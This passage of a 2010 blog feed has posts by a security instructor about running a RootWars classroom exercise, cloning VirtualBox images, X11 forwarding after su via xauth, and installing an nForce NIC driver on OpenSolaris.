Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;The students were all very engaged, I practically had to kick them out of the classroom!  For the most part they are making sound security decisions although they should have universally made a more conscious effort to locate the incident response elements of this challenge rather than worrying about network facing services and user accounts quite so much.&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;I can feel the frustration that stems from stepping out of your comfort zone and launching yourself into the unknown.  Its the painful part of growing and expanding your horizons.&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;All and all it was a smashing success, it practically ran itself which allowed me to make myself more available to answer questions and provide encouragement.  Until next time.&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;May Your Skill Prevail.&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-7856069742037090262?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/7856069742037090262/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=7856069742037090262&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/7856069742037090262'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/7856069742037090262'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2010/05/rootwars-day-one.html' title='Rootwars - Day One'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-1166248637202724456</id><published>2010-05-05T10:40:00.000-07:00</published><updated>2010-06-13T19:45:44.893-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='uuid'/><category scheme='http://www.blogger.com/atom/ns#' term='Virtualbox'/><category scheme='http://www.blogger.com/atom/ns#' term='Rootwars'/><category scheme='http://www.blogger.com/atom/ns#' term='vmdk'/><category scheme='http://www.blogger.com/atom/ns#' term='VBoxManage'/><title type='text'>Cloning a HD image in Virtualbox 3.1.6</title><content type='html'>&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;To create multiple appliances for the upcoming RootWars I needed to replicate the base image.  VBoxManage to the rescue!&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="writeboardbody"&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;cd /export/home/sp00k/.VirtualBox/HardDisks&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt; &lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;VBoxManage clonehd —format &lt;/span&gt;&lt;span class="caps" style="font-size: small;"&gt;VMDK&lt;/span&gt;&lt;span style="font-size: small;"&gt; RH9.vmdk  IGSrootwars1.vmdk&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt; &lt;/div&gt;&lt;div style="font-family: verdana;"&gt;&lt;span style="font-family: Verdana,sans-serif; font-size: small;"&gt;It assigns a new &lt;/span&gt;&lt;span class="caps" style="font-family: Verdana,sans-serif; font-size: small;"&gt;UUID&lt;/span&gt;&lt;span style="font-family: Verdana,sans-serif; font-size: small;"&gt; which is the  important part when launching duplicate images.  This took about 5 minutes per image to complete.&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-1166248637202724456?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/1166248637202724456/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=1166248637202724456&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/1166248637202724456'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/1166248637202724456'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2010/05/cloning-hd-image-in-virtualbox-316.html' title='Cloning a HD image in Virtualbox 3.1.6'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-3131348332025555128</id><published>2010-05-05T10:32:00.000-07:00</published><updated>2010-06-13T19:48:40.372-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='MIT-MAGIC-COOKIE'/><category scheme='http://www.blogger.com/atom/ns#' term='X11 cookie'/><category scheme='http://www.blogger.com/atom/ns#' term='SSH xauth'/><category scheme='http://www.blogger.com/atom/ns#' term='Wireshark'/><title type='text'>X11 forwarding after running su</title><content type='html'>&lt;div class="writeboardbody" style="font-family: verdana;"&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;I needed to forward a Wireshark session over X11 as the root user.  The training virtual machine in question doesn't allow remote logins via SSH.&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt; &lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;This authentication mechanism works on a cookie..an encrypted bit of data identifying  the user.  We can easily replicate this and allow root to forward  sessions over X11 when escalating privileges from another user.&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt; &lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;sp00k@carapace ~ $ xauth list $&lt;/span&gt;&lt;span class="caps" style="font-size: small;"&gt;DISPLAY&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;carapace/unix:10  &lt;/span&gt;&lt;span class="caps" style="font-size: small;"&gt;MIT&lt;/span&gt;&lt;span style="font-size: small;"&gt;-&lt;/span&gt;&lt;span class="caps" style="font-size: small;"&gt;MAGIC&lt;/span&gt;&lt;span style="font-size: small;"&gt;-&lt;/span&gt;&lt;span class="caps" style="font-size: small;"&gt;COOKIE&lt;/span&gt;&lt;span style="font-size: small;"&gt;-1  aee3eb981908d182d190f65ae01e9665&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt; &lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;sp00k@carapace ~ $ su&lt;br /&gt;Password:&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt; &lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;carapace sp00k #  xauth add carapace/unix:10 &lt;/span&gt;&lt;span class="caps" style="font-size: small;"&gt;MIT&lt;/span&gt;&lt;span style="font-size: small;"&gt;-&lt;/span&gt;&lt;span class="caps" style="font-size: small;"&gt;MAGIC&lt;/span&gt;&lt;span style="font-size: small;"&gt;-&lt;/span&gt;&lt;span class="caps" style="font-size: small;"&gt;COOKIE&lt;/span&gt;&lt;span style="font-size: small;"&gt;-1  aee3eb981908d182d190f65ae01e9665&lt;br /&gt;xauth:  creating new authority file /root/.Xauthority&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt; &lt;/div&gt;&lt;span style="font-family: Verdana,sans-serif; font-size: small;"&gt;And just like that success, as long as everything is setup correctly  for X11 forwarding initially this &lt;i&gt;should&lt;/i&gt;&lt;/span&gt; work.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-3131348332025555128?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/3131348332025555128/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=3131348332025555128&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/3131348332025555128'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/3131348332025555128'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2010/05/x11-forwarding-after-running-su.html' title='X11 forwarding after running su'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-8433231968110304634</id><published>2010-05-05T09:38:00.000-07:00</published><updated>2010-06-13T19:49:09.230-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Opensolaris'/><category scheme='http://www.blogger.com/atom/ns#' term='nic'/><category scheme='http://www.blogger.com/atom/ns#' term='nvidia'/><category scheme='http://www.blogger.com/atom/ns#' term='nforce'/><title type='text'>Nvidia NFORCE NIC and Opensolaris 2009.06</title><content type='html'>&lt;div class="writeboardbody" style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;When I first started up Opensolaris I noticed that the internal motherboard NIC didn't work and went out in search of a solution.  Here is a culmination of my findings in a solution that worked for me.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt; &lt;br /&gt;&lt;span style="font-size: small;"&gt;Verify you have an Nforce chipset based &lt;/span&gt;&lt;span class="caps" style="font-size: small;"&gt;NIC&lt;/span&gt;&lt;span style="font-size: small;"&gt;:&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt; &lt;br /&gt;&lt;span style="font-size: small;"&gt;“/usr/X11R6/bin/scanpci -v”&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;pci bus 0×0000 cardnum 0×0f function 0×00: vendor 0×10de device  0×07dc&lt;br /&gt;nVidia Corporation MCP73 Ethernet&lt;br /&gt;CardVendor 0×1043 card 0×816a (ASUSTeK Computer Inc., Card unknown)&lt;/span&gt; &lt;span class="caps" style="font-size: small;"&gt;STATUS&lt;/span&gt;&lt;span style="font-size: small;"&gt;    0×00b0  &lt;/span&gt;&lt;span class="caps" style="font-size: small;"&gt;COMMAND&lt;/span&gt;&lt;span style="font-size: small;"&gt;  0×0007&lt;/span&gt; &lt;span class="caps" style="font-size: small;"&gt;CLASS&lt;/span&gt;&lt;span style="font-size: small;"&gt;     0×02 0×00 0×00  &lt;/span&gt;&lt;span class="caps" style="font-size: small;"&gt;REVISION&lt;/span&gt;&lt;span style="font-size: small;"&gt;  0xa2&lt;/span&gt; &lt;span class="caps" style="font-size: small;"&gt;BIST&lt;/span&gt;&lt;span style="font-size: small;"&gt;      0×00  &lt;/span&gt;&lt;span class="caps" style="font-size: small;"&gt;HEADER&lt;/span&gt;&lt;span style="font-size: small;"&gt;  0×00  &lt;/span&gt;&lt;span class="caps" style="font-size: small;"&gt;LATENCY&lt;/span&gt;&lt;span style="font-size: small;"&gt; 0×00  &lt;/span&gt;&lt;span class="caps" style="font-size: small;"&gt;CACHE&lt;/span&gt;&lt;span style="font-size: small;"&gt;  0×00&lt;br /&gt;BASE0     0xefffd000 &lt;/span&gt;&lt;span class="caps" style="font-size: small;"&gt;SIZE&lt;/span&gt;&lt;span style="font-size: small;"&gt; 4096  &lt;/span&gt;&lt;span class="caps" style="font-size: small;"&gt;MEM&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;BASE1     0×0000f600 &lt;/span&gt;&lt;span class="caps" style="font-size: small;"&gt;SIZE&lt;/span&gt;&lt;span style="font-size: small;"&gt; 8  I/O&lt;br /&gt;BASE2     0xefffc000 &lt;/span&gt;&lt;span class="caps" style="font-size: small;"&gt;SIZE&lt;/span&gt;&lt;span style="font-size: small;"&gt; 256  &lt;/span&gt;&lt;span class="caps" style="font-size: small;"&gt;MEM&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;BASE3     0xefffb000 &lt;/span&gt;&lt;span class="caps" style="font-size: small;"&gt;SIZE&lt;/span&gt;&lt;span style="font-size: small;"&gt; 16  &lt;/span&gt;&lt;span class="caps" style="font-size: small;"&gt;MEM&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt; &lt;span class="caps" style="font-size: small;"&gt;BASEROM&lt;/span&gt;&lt;span style="font-size: small;"&gt;   0×00000000  addr 0×00000000&lt;br /&gt;MAX_LAT   0×14  MIN_GNT 0×01  INT_PIN 0×01  INT_LINE 0×0f&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt; &lt;br /&gt;&lt;span style="font-size: small;"&gt;It’s there so it must need a hardware driver to function.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt; &lt;br /&gt;&lt;span style="font-size: small;"&gt;After Google searching a bit I found the following driver:&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt; &lt;br /&gt;&lt;span style="font-size: small;"&gt;http://homepage2.nifty.com/mrym3/taiyodo/nfo-2.6.3.tar.gz&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt; &lt;br /&gt;&lt;span style="font-size: small;"&gt;The steps straight outta the &lt;/span&gt;&lt;span class="caps" style="font-size: small;"&gt;README&lt;/span&gt;&lt;br /&gt;&lt;span class="caps" style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;1. gunzip nfo-2.6.3.tar.gz&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;2. tar -xvf nfo-2.6.3.tar&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;3. cd nfo-2.6.3&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;4. rm obj Makefile&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;5. ln -s Makefile.${KARCH}_${COMPILER} Makefile  ( for me it was ln -s  Makefile.amd64_gcc  Makefile )&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;6. ln -s ${KARCH} obj ( for me it was ln -s amd64 obj )&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;7. rm Makefile.config&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;8. ln -s Makefile.config_gld3 Makefile.config&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;9. /usr/ccs/bin/make&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;10. /usr/ccs/bin/make install&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;11. cp nfo.conf /kernel/drv/nfo.conf&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;12. ./adddrv.sh (I had to reboot here and resume at the following steps, &lt;/span&gt;&lt;span class="caps" style="font-size: small;"&gt;YMMV&lt;/span&gt;&lt;span style="font-size: small;"&gt;)&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;13. modload obj/nfo&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;14. devfsadm -i nfo&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;15. ifconfig nfoN plumb ( where N is the device number, for me it was  nfo0 )&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;16. ifconfig nfo0 dhcp start ( this is if you want your interface to use  &lt;/span&gt;&lt;span class="caps" style="font-size: small;"&gt;DHCP&lt;/span&gt;&lt;span style="font-size: small;"&gt; )&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;17. touch /etc/dhcp.nfo0  ( this is if you want your interface to use  dhcp when it come back up)&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;18. edit /etc/nsswitch.conf  ( Where it says host: files, change it to  host: files dns )&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;19. reboot —r&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;All is well now.&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-8433231968110304634?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/8433231968110304634/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=8433231968110304634&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/8433231968110304634'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/8433231968110304634'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2010/05/nvidia-nforce-nic-and-opensolaris.html' title='Nvidia NFORCE NIC and Opensolaris 2009.06'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-8080089748633487923</id><published>2010-05-05T08:26:00.000-07:00</published><updated>2010-06-13T19:49:37.732-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='eggdrop'/><category scheme='http://www.blogger.com/atom/ns#' term='gcc'/><category scheme='http://www.blogger.com/atom/ns#' term='tun/tap'/><category scheme='http://www.blogger.com/atom/ns#' term='syslog'/><category scheme='http://www.blogger.com/atom/ns#' term='epic'/><category scheme='http://www.blogger.com/atom/ns#' term='ssl'/><category scheme='http://www.blogger.com/atom/ns#' term='Mac OSX'/><category scheme='http://www.blogger.com/atom/ns#' term='Rootwars'/><category scheme='http://www.blogger.com/atom/ns#' term='Redhat'/><category scheme='http://www.blogger.com/atom/ns#' term='ircd-hybrid'/><category scheme='http://www.blogger.com/atom/ns#' term='Sguil'/><category scheme='http://www.blogger.com/atom/ns#' term='Roothack.org'/><category scheme='http://www.blogger.com/atom/ns#' term='Securix-NSM'/><category scheme='http://www.blogger.com/atom/ns#' term='IRC'/><category scheme='http://www.blogger.com/atom/ns#' term='ntp'/><category scheme='http://www.blogger.com/atom/ns#' term='Virtualbox'/><category scheme='http://www.blogger.com/atom/ns#' term='Backtrack 4'/><category scheme='http://www.blogger.com/atom/ns#' term='Opensolaris'/><title type='text'>Today is the day...RootWars!</title><content type='html'>&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;The last 10 days have been a whirlwind of computer power geeking:&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;1.  Crash course on Opensolaris, I chose it for whatever reason and am now glad for it.  I had the opportunity to learn the platform and some basic administration for the OS such as installing GCC, adding NICs, managing accounts, adding package repositories, installing TUN/TAP, bridging and tunctl capabilities from source, getting NTP to work correctly as a Stratum 3 server, centralized syslog, getting packet sniffing to work correctly, etc.&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;2.  Getting an ircd-hybrid IRC server up and running in SSL mode with an accompanying Eggdrop bot on Opensolaris.&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;3.  Cloning the Rootwars Virtualbox HD image using VBoxManage and learning a lot about Virtualabox and its networking capabilities (or lack thereof).&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;4.  Writing documentation such as Rules of Conduct (with a manual scoring system), a Survival guide (based on the old Roothack.org materials...R.I.P. epic), instructions how to connect to the IRC server with SSL enabled, etc.&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;5. Configuring the Rootwars image itself (standing on the shoulders of giants, thanks j0e!), getting NTP, syslog and general networking to function correctly in a Redhat 9 Virtualbox appliance.&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;6. Being introduced to Securix-NSM, this will be the monitoring platform I will use for a sguil server and connect sguil clients via Mac OSX and Backtrack 4.  Securix-NSM will also be running as a Virtualbox appliance.  As a standby I also created OSSIM, HeX Live and Honeywall Roo Virtualbox appliances.&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;There was more...I probably won't be able to recall it in totality until the smoke clears and I have had a chance to review my notes and soak in the entire experience.&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;I'm very excited about the Rootwars this evening and the hands on experience it will deliver to the students and participants.&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;May Your Skill Prevail&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-8080089748633487923?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/8080089748633487923/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=8080089748633487923&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/8080089748633487923'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/8080089748633487923'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2010/05/today-is-dayrootwars.html' title='Today is the day...RootWars!'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-1884539131985245205</id><published>2010-05-04T21:21:00.000-07:00</published><updated>2010-06-13T19:50:05.833-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Virtualbox'/><category scheme='http://www.blogger.com/atom/ns#' term='IS317'/><category scheme='http://www.blogger.com/atom/ns#' term='Opensolaris'/><category scheme='http://www.blogger.com/atom/ns#' term='Rootwars'/><title type='text'>Rootwars - TIME TO RUMBLE</title><content type='html'>&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;I have spent the last week and a half putting together a Rootwars exercise for the IS317 Hacking and Network Defense class that will run over the course of the next 3 weeks.  The bastion host is running Opensolaris with Virtualbox 3.1.6.  The Rootwars images are Redhat 9 appliances with built in backdoors, trojans and rootkits.  The whole thing will be monitored using Securix-NSM and sguil.  I plan to post a link when the exercise is complete with a .pcap file as well as an analysis of what worked and what didn't.&lt;/span&gt;&lt;span style="font-size: small;"&gt; &lt;/span&gt;&lt;span style="font-size: small;"&gt; I wouldn't have been able to put this together on such a short time schedule without the assistance of Joe McCray of LearnSecurityOnline.com.  Thanks j0e!&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;Stay tuned.&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: Verdana,sans-serif;"&gt;&lt;span style="font-size: small;"&gt;May Your Skill Prevail.&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-1884539131985245205?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/1884539131985245205/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=1884539131985245205&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/1884539131985245205'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/1884539131985245205'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2010/05/rootwars-time-to-rumble.html' title='Rootwars - TIME TO RUMBLE'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-2774613989635618731</id><published>2010-05-04T21:17:00.000-07:00</published><updated>2010-06-13T19:50:30.373-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='training'/><category scheme='http://www.blogger.com/atom/ns#' term='Security Workshop'/><category scheme='http://www.blogger.com/atom/ns#' term='ITT'/><title type='text'>"Training" Now</title><content type='html'>&lt;span style="font-size: 100%;"&gt;&lt;span style="font-family: verdana;"&gt;&lt;span style="font-family: Verdana,sans-serif; font-size: small;"&gt;Who would have ever thought?  For the past few months I have been presenting a Security Workshop for ITT Tech and providing instruction and labs for Bachelor level classes (Firewall/VPN and Windows Security classes last quarter, Hacking and Forensic classes this quarter).&lt;br /&gt;&lt;br /&gt;Its been very rewarding transferring my knowledge in the field to up and coming Information Security Professionals.  I look forward to what the future brings in this regard.&lt;/span&gt; &lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;div 